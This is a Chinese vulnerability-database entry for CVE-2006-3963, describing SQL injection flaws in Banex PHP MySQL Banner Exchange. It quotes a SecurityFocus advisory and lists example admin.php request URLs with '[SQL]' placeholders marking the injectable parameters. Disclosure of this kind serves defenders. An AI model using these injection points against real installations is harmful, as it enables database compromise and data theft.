Banex PHP MySQL Banner Exchange多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110716 漏洞类型 SQL注入
发布时间 2006-07-31 更新时间 2006-08-03
CVE编号 CVE-2006-3963 CNNVD-ID CNNVD-200608-013
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28307
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-013
|漏洞详情
BanexPHPMySQLBannerExchange2.21中存在多个SQL注入漏洞,远程攻击者可借助:(1)提交到(a)signup.php的site_name参数,和(2)提交到(b)admin.php的id参数,(3)deleteuserbanner参数,(4)viewmem参数,(5)viewmemunb参数,(6)viewunmem参数,或(7)deleteuser参数,来执行任意SQL指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/19240/info
 
PHP MySQL Banner Exchange is prone to multiple SQL-injection vulnerabilities and a remote file-include vulnerability because it fails to properly sanitize user-supplied input. 
 
An attacker can exploit the SQL-injection vulnerabilities to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
 
An attacker may also leverage the remote file-include issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process.
 
Version 2.1 of the application is affected by these vulnerabilities; other versions may also be affected.

http://www.example.com/admin.php?activatebanner&id=-1%20[SQLi] 
http://www.example.com/admin.php?activateuser&id='+[SQL] 
http://www.example.com/admin.php?deleteunuser&id='+[SQL] 
http://www.example.com/admin.php?deleteuserbanner&deleteuserbanner='+[SQL] 
http://www.example.com/admin.php?deleteuserbanner&deleteuserbanner='+[SQL] 
http://www.example.com/admin.php?viewmem&viewmem='+[SQL] 
http://www.example.com/admin.php?viewmemunb&viewmemunb='+[SQL] 
http://www.example.com/admin.php?viewunmem&viewunmem='+[SQL] 
http://www.example.com/admin.php?deletebanner&id=-1+[SQL] 
http://www.example.com/admin.php?activateuser&deleteuser='+[SQL] 
http://www.example.com/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
|参考资料

来源:BID
名称:19240
链接:http://www.securityfocus.com/bid/19240
来源:FULLDISC
名称:20060730BanexMultipleVulnerabilities
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m=115423462216111&w=2